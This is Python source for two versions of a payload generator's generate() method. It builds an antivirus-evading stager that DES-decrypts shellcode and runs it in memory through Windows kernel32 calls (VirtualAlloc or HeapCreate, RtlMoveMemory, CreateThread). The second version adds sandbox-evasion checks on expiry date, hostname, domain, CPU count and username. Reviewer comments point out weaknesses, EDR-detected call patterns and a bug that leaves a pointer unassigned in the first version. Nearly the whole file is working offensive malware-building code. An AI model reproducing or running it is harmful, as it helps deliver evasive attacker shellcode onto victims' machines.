    def generate(self) -> None:
        """Build the Python source of a DES-wrapped stager and store it on ``self``.

        Reads ``self.cli_shellcode`` / ``self.shellcode`` / ``self.cli_opts`` and
        ``self.required_options`` (``INJECT_METHOD``, ``USE_PYHERION``), sets
        ``self.payload_type`` and ``self.payload_source_code``, and returns nothing.

        Reviewer note: the DES key and IV are written into the emitted source as
        string literals (see the ``DES.new(...)`` line below), so the encryption only
        hides the shellcode from static string matching on the file — anyone holding
        the file can recover the plaintext, and DES is a legacy cipher in any case.
        """

        # Generate the variable names
        # Random identifiers for the emitted source; randomString() is a project
        # helper whose alphabet and length are not visible here.
        randctypes = evasion_helpers.randomString()
        ShellcodeVariableName = evasion_helpers.randomString()
        rand_ptr = evasion_helpers.randomString()
        rand_ht = evasion_helpers.randomString()
        RandDESPayload = evasion_helpers.randomString()
        RandEncShellCodePayload = evasion_helpers.randomString()
        rand_virtual_protect = evasion_helpers.randomString()

        # Generate the shellcode
        # Either take shellcode handed in on the command line, or ask the project's
        # shellcode object for it and record where it came from in payload_type.
        if not self.cli_shellcode:
            Shellcode = self.shellcode.generate(self.cli_opts)
            if self.shellcode.msfvenompayload:
                self.payload_type = self.shellcode.msfvenompayload
            elif self.shellcode.payload_choice:
                self.payload_type = self.shellcode.payload_choice
                # Cleared so a later call does not reuse this choice.
                self.shellcode.payload_choice = ''
            # assume custom shellcode
            else:
                self.payload_type = 'custom'
        else:
            Shellcode = self.cli_shellcode
        # latin-1 maps every code point below 256 to itself, and unicode_escape then
        # turns backslash escapes such as "\x41" into the characters they denote, so
        # escaped shellcode text becomes its raw byte values (as a str) before encryption.
        Shellcode = Shellcode.encode('latin-1')
        Shellcode = Shellcode.decode('unicode_escape')

        # Project helper; judging by its two return values it emits the opening
        # lines of the stager and reports how many indentation levels they open.
        # TODO(review): confirm against gamemaker.senecas_games.
        payload_code, num_tabs_required = gamemaker.senecas_games(self)

        # encrypt the shellcode and get our randomized key
        # des_encryption() is a project helper; from the base64.b64decode() emitted
        # below, encoded_ciphertext is base64 bytes, hence the ascii decode.
        encoded_ciphertext, encryption_key, iv_value = encryption.des_encryption(
            Shellcode)
        encoded_ciphertext = encoded_ciphertext.decode('ascii')

        # Both branches below emit the same decrypt prologue and the same
        # kernel32 thread launch; only how memory is obtained differs.
        # Every emitted line is prefixed with num_tabs_required tabs so it sits
        # inside whatever conditional nesting the preamble opened.
        if self.required_options["INJECT_METHOD"][0].lower() == "virtual":

            # Create Payload File
            payload_code += '\t' * num_tabs_required + 'from Crypto.Cipher import DES\n'
            payload_code += '\t' * num_tabs_required + 'import base64\n'
            payload_code += '\t' * num_tabs_required + 'import ctypes as ' + randctypes + '\n'
            # Key and IV land in the stager as plain literals (see docstring).
            payload_code += '\t' * num_tabs_required + RandDESPayload + ' = DES.new(\'' + encryption_key + '\', DES.MODE_CBC, \'' + iv_value + '\')\n'
            payload_code += '\t' * num_tabs_required + RandEncShellCodePayload + ' = \'' + encoded_ciphertext + '\'\n'
            payload_code += '\t' * num_tabs_required + ShellcodeVariableName + ' = base64.b64decode(' + RandEncShellCodePayload + ')\n'
            payload_code += '\t' * num_tabs_required + ShellcodeVariableName + ' = ' + RandDESPayload + '.decrypt(' + ShellcodeVariableName + ')\n'
            # NOTE(review): no line emitted by this branch assigns rand_ptr before it
            # is used here, so the generated stager raises NameError at this point —
            # presumably an omission in this variant; left as-is.
            payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + rand_ptr + '),' + ShellcodeVariableName + ',' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')))\n'
            # Page-protection change followed by CreateThread on the same region —
            # the sequence memory-scanning EDR hooks key on; the VirtualProtect return
            # value is stored but never checked by the emitted code.
            payload_code += '\t' * num_tabs_required + rand_virtual_protect + ' = ' + randctypes + '.windll.kernel32.VirtualProtect(' + randctypes + '.c_int(' + rand_ptr + '),' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')),' + randctypes + '.c_int(0x20),' + randctypes + '.byref(' + randctypes + '.c_uint32(0)))\n'
            payload_code += '\t' * num_tabs_required + rand_ht + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + rand_ptr + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n'
            # -1 == INFINITE: the stager blocks until the thread ends.
            payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + rand_ht + '),' + randctypes + '.c_int(-1))\n'

        elif self.required_options["INJECT_METHOD"][0].lower() == "heap":

            # Generate Random Variable Names
            HeapVar = evasion_helpers.randomString()

            # Create Payload File
            payload_code += '\t' * num_tabs_required + 'from Crypto.Cipher import DES\n'
            payload_code += '\t' * num_tabs_required + 'import base64\n'
            payload_code += '\t' * num_tabs_required + 'import ctypes as ' + randctypes + '\n'
            payload_code += '\t' * num_tabs_required + RandDESPayload + ' = DES.new(\'' + encryption_key + '\', DES.MODE_CBC, \'' + iv_value + '\')\n'
            payload_code += '\t' * num_tabs_required + RandEncShellCodePayload + ' = \'' + encoded_ciphertext + '\'\n'
            payload_code += '\t' * num_tabs_required + ShellcodeVariableName + ' = base64.b64decode(' + RandEncShellCodePayload + ')\n'
            payload_code += '\t' * num_tabs_required + ShellcodeVariableName + ' = ' + RandDESPayload + '.decrypt(' + ShellcodeVariableName + ')\n'
            # 0x00040000 is HEAP_CREATE_ENABLE_EXECUTE, so this branch needs no
            # separate protection change; the heap is sized at twice the shellcode
            # length and 0x00000008 (HEAP_ZERO_MEMORY) is passed to HeapAlloc.
            payload_code += '\t' * num_tabs_required + HeapVar + ' = ' + randctypes + '.windll.kernel32.HeapCreate(' + randctypes + '.c_int(0x00040000),' + randctypes + '.c_int(len(' + ShellcodeVariableName + ') * 2),' + randctypes + '.c_int(0))\n'
            payload_code += '\t' * num_tabs_required + rand_ptr + ' = ' + randctypes + '.windll.kernel32.HeapAlloc(' + randctypes + '.c_int(' + HeapVar + '),' + randctypes + '.c_int(0x00000008),' + randctypes + '.c_int(len( ' + ShellcodeVariableName + ')))\n'
            payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + rand_ptr + '),' + ShellcodeVariableName + ',' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')))\n'
            payload_code += '\t' * num_tabs_required + rand_ht + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + rand_ptr + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n'
            payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + rand_ht + '),' + randctypes + '.c_int(-1))\n'

        # Any other INJECT_METHOD value silently emits no injection code at all;
        # the stager then consists of the preamble only.

        # pyherion() is a project helper, presumably a further obfuscation layer
        # over the whole emitted source — TODO(review): confirm.
        if self.required_options["USE_PYHERION"][0].lower() == "y":
            payload_code = encryption.pyherion(payload_code)

        # The result is handed back through the instance, not returned.
        self.payload_source_code = payload_code
        return
    def generate(self) -> None:
        """Build the Python source of a DES-wrapped stager and store it on ``self``.

        Reads ``self.cli_shellcode`` / ``self.shellcode`` / ``self.cli_opts`` and the
        ``self.required_options`` keys ``EXPIRE_PAYLOAD``, ``HOSTNAME``, ``DOMAIN``,
        ``PROCESSORS``, ``USERNAME``, ``INJECT_METHOD`` and ``USE_PYHERION``; sets
        ``self.payload_type`` and ``self.payload_source_code``; returns nothing.

        Each environment check that is enabled (value other than ``"x"``) is emitted
        as an ``if`` that wraps everything after it, so a failed check means the
        rest of the stager simply never runs.

        Reviewer note: the DES key and IV are written into the emitted source as
        string literals (see the ``DES.new(...)`` line below), so the encryption only
        hides the shellcode from static string matching on the file — anyone holding
        the file can recover the plaintext, and DES is a legacy cipher in any case.
        Option values are spliced into the emitted source unescaped; a quote, newline
        or backslash in one of them breaks the generated syntax.
        """

        # How I'm tracking the number of nested tabs needed
        # to make the payload
        num_tabs_required = 0
        payload_code = ''

        # Generate the variable names
        # Random identifiers for the emitted source; randomString() is a project
        # helper whose alphabet and length are not visible here.
        randctypes = evasion_helpers.randomString()
        ShellcodeVariableName = evasion_helpers.randomString()
        RandPtr = evasion_helpers.randomString()
        RandHt = evasion_helpers.randomString()
        RandDESPayload = evasion_helpers.randomString()
        RandEncShellCodePayload = evasion_helpers.randomString()

        # Generate the shellcode
        # Either take shellcode handed in on the command line, or ask the project's
        # shellcode object for it and record where it came from in payload_type.
        if not self.cli_shellcode:
            Shellcode = self.shellcode.generate(self.cli_opts)
            if self.shellcode.msfvenompayload:
                self.payload_type = self.shellcode.msfvenompayload
            elif self.shellcode.payload_choice:
                self.payload_type = self.shellcode.payload_choice
                # Cleared so a later call does not reuse this choice.
                self.shellcode.payload_choice = ''
            # assume custom shellcode
            else:
                self.payload_type = 'custom'
        else:
            Shellcode = self.cli_shellcode
        # latin-1 maps every code point below 256 to itself, and unicode_escape then
        # turns backslash escapes such as "\x41" into the characters they denote, so
        # escaped shellcode text becomes its raw byte values (as a str) before encryption.
        Shellcode = Shellcode.encode('latin-1')
        Shellcode = Shellcode.decode('unicode_escape')

        # Optional expiry gate: the cut-off date is computed here, at build time,
        # and the emitted stager compares it against the target's local clock.
        # int() raises ValueError if EXPIRE_PAYLOAD is neither "x" nor an integer.
        # Assumes date/timedelta come from a file-level datetime import not visible here.
        if self.required_options["EXPIRE_PAYLOAD"][0].lower() != "x":

            RandToday = evasion_helpers.randomString()
            RandExpire = evasion_helpers.randomString()

            todaysdate = date.today()
            expiredate = str(todaysdate + timedelta(
                days=int(self.required_options["EXPIRE_PAYLOAD"][0])))

            # Create Payload code
            payload_code += '\t' * num_tabs_required + 'from datetime import datetime\n'
            payload_code += '\t' * num_tabs_required + 'from datetime import date\n'
            payload_code += '\t' * num_tabs_required + RandToday + ' = datetime.now()\n'
            # expiredate[2:] drops the century from "YYYY-MM-DD" to match the
            # two-digit "%y-%m-%d" format the emitted strptime() uses.
            payload_code += '\t' * num_tabs_required + RandExpire + ' = datetime.strptime(\"' + expiredate[
                2:] + '\",\"%y-%m-%d\") \n'
            payload_code += '\t' * num_tabs_required + 'if ' + RandToday + ' < ' + RandExpire + ':\n'

            # Add a tab for this check
            num_tabs_required += 1

        # Optional hostname gate. Note the direction of the test: the machine's
        # platform.node() must be a substring of the configured value, not the
        # other way round, and the comparison is case-sensitive.
        if self.required_options["HOSTNAME"][0].lower() != "x":

            rand_hostname = evasion_helpers.randomString()

            payload_code += '\t' * num_tabs_required + 'import platform\n'
            payload_code += '\t' * num_tabs_required + rand_hostname + ' = platform.node()\n'
            payload_code += '\t' * num_tabs_required + 'if ' + rand_hostname + ' in \"' + self.required_options[
                "HOSTNAME"][0] + '\":\n'

            # Add a tab for this check
            num_tabs_required += 1

        # Optional domain gate, same substring direction as the hostname gate:
        # socket.getfqdn() must occur inside the configured DOMAIN value.
        if self.required_options["DOMAIN"][0].lower() != "x":

            rand_domain = evasion_helpers.randomString()

            payload_code += '\t' * num_tabs_required + 'import socket\n'
            payload_code += '\t' * num_tabs_required + rand_domain + ' = socket.getfqdn()\n'
            payload_code += '\t' * num_tabs_required + 'if ' + rand_domain + ' in \"' + self.required_options[
                "DOMAIN"][0] + '\":\n'

            # Add a tab for this check
            num_tabs_required += 1

        # Optional CPU-count gate. The PROCESSORS value is spliced in as a bare
        # expression, so anything that is not an integer literal yields a stager
        # that fails to parse or compares against the wrong thing.
        if self.required_options["PROCESSORS"][0].lower() != "x":

            rand_processor_count = evasion_helpers.randomString()

            payload_code += '\t' * num_tabs_required + 'import multiprocessing\n'
            payload_code += '\t' * num_tabs_required + rand_processor_count + ' = multiprocessing.cpu_count()\n'
            payload_code += '\t' * num_tabs_required + 'if ' + rand_processor_count + ' >= ' + self.required_options[
                "PROCESSORS"][0] + ':\n'

            # Add a tab for this check
            num_tabs_required += 1

        # Optional username gate: here the configured value must be a substring
        # of getpass.getuser(), both lower-cased — the opposite direction from
        # the hostname/domain gates above.
        if self.required_options["USERNAME"][0].lower() != "x":

            rand_user_name = evasion_helpers.randomString()

            payload_code += '\t' * num_tabs_required + 'import getpass\n'
            payload_code += '\t' * num_tabs_required + rand_user_name + ' = getpass.getuser()\n'
            payload_code += '\t' * num_tabs_required + 'if \'' + self.required_options[
                "USERNAME"][
                    0] + '\'.lower() in ' + rand_user_name + '.lower():\n'

            # Add a tab for this check
            num_tabs_required += 1

        # encrypt the shellcode and get our randomized key
        # des_encryption() is a project helper; from the base64.b64decode() emitted
        # below, encoded_ciphertext is base64 bytes, hence the ascii decode.
        encoded_ciphertext, encryption_key, iv_value = encryption.des_encryption(
            Shellcode)
        encoded_ciphertext = encoded_ciphertext.decode('ascii')

        # Both branches below emit the same decrypt prologue and the same
        # kernel32 thread launch; only how memory is obtained differs.
        # Every emitted line is prefixed with num_tabs_required tabs so it sits
        # inside all of the gates opened above.
        if self.required_options["INJECT_METHOD"][0].lower() == "virtual":

            # Create Payload File
            payload_code += '\t' * num_tabs_required + 'from Crypto.Cipher import DES\n'
            payload_code += '\t' * num_tabs_required + 'import base64\n'
            payload_code += '\t' * num_tabs_required + 'import ctypes as ' + randctypes + '\n'
            # Key and IV land in the stager as plain literals (see docstring).
            payload_code += '\t' * num_tabs_required + RandDESPayload + ' = DES.new(\'' + encryption_key + '\', DES.MODE_CBC, \'' + iv_value + '\')\n'
            payload_code += '\t' * num_tabs_required + RandEncShellCodePayload + ' = \'' + encoded_ciphertext + '\'\n'
            payload_code += '\t' * num_tabs_required + ShellcodeVariableName + ' = base64.b64decode(' + RandEncShellCodePayload + ')\n'
            payload_code += '\t' * num_tabs_required + ShellcodeVariableName + ' = ' + RandDESPayload + '.decrypt(' + ShellcodeVariableName + ')\n'
            # Allocates a region that is executable from the start (0x40 is
            # PAGE_EXECUTE_READWRITE) and then starts a thread on it — the
            # RWX-allocation + CreateThread sequence memory-scanning EDR hooks key on.
            payload_code += '\t' * num_tabs_required + RandPtr + ' = ' + randctypes + '.windll.kernel32.VirtualAlloc(' + randctypes + '.c_int(0),' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')),' + randctypes + '.c_int(0x3000),' + randctypes + '.c_int(0x40))\n'
            payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + RandPtr + '),' + ShellcodeVariableName + ',' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')))\n'
            payload_code += '\t' * num_tabs_required + RandHt + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + RandPtr + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n'
            # -1 == INFINITE: the stager blocks until the thread ends.
            payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + RandHt + '),' + randctypes + '.c_int(-1))\n'

        elif self.required_options["INJECT_METHOD"][0].lower() == "heap":

            # Generate Random Variable Names
            HeapVar = evasion_helpers.randomString()

            # Create Payload File
            payload_code += '\t' * num_tabs_required + 'from Crypto.Cipher import DES\n'
            payload_code += '\t' * num_tabs_required + 'import base64\n'
            payload_code += '\t' * num_tabs_required + 'import ctypes as ' + randctypes + '\n'
            payload_code += '\t' * num_tabs_required + RandDESPayload + ' = DES.new(\'' + encryption_key + '\', DES.MODE_CBC, \'' + iv_value + '\')\n'
            payload_code += '\t' * num_tabs_required + RandEncShellCodePayload + ' = \'' + encoded_ciphertext + '\'\n'
            payload_code += '\t' * num_tabs_required + ShellcodeVariableName + ' = base64.b64decode(' + RandEncShellCodePayload + ')\n'
            payload_code += '\t' * num_tabs_required + ShellcodeVariableName + ' = ' + RandDESPayload + '.decrypt(' + ShellcodeVariableName + ')\n'
            # 0x00040000 is HEAP_CREATE_ENABLE_EXECUTE, so this branch needs no
            # separate protection change; the heap is sized at twice the shellcode
            # length and 0x00000008 (HEAP_ZERO_MEMORY) is passed to HeapAlloc.
            payload_code += '\t' * num_tabs_required + HeapVar + ' = ' + randctypes + '.windll.kernel32.HeapCreate(' + randctypes + '.c_int(0x00040000),' + randctypes + '.c_int(len(' + ShellcodeVariableName + ') * 2),' + randctypes + '.c_int(0))\n'
            payload_code += '\t' * num_tabs_required + RandPtr + ' = ' + randctypes + '.windll.kernel32.HeapAlloc(' + randctypes + '.c_int(' + HeapVar + '),' + randctypes + '.c_int(0x00000008),' + randctypes + '.c_int(len( ' + ShellcodeVariableName + ')))\n'
            payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + RandPtr + '),' + ShellcodeVariableName + ',' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')))\n'
            payload_code += '\t' * num_tabs_required + RandHt + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + RandPtr + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n'
            payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + RandHt + '),' + randctypes + '.c_int(-1))\n'

        # Any other INJECT_METHOD value silently emits no injection code at all;
        # the stager then consists of the environment checks only.

        # pyherion() is a project helper, presumably a further obfuscation layer
        # over the whole emitted source — TODO(review): confirm.
        if self.required_options["USE_PYHERION"][0].lower() == "y":
            payload_code = encryption.pyherion(payload_code)

        # The result is handed back through the instance, not returned.
        self.payload_source_code = payload_code
        return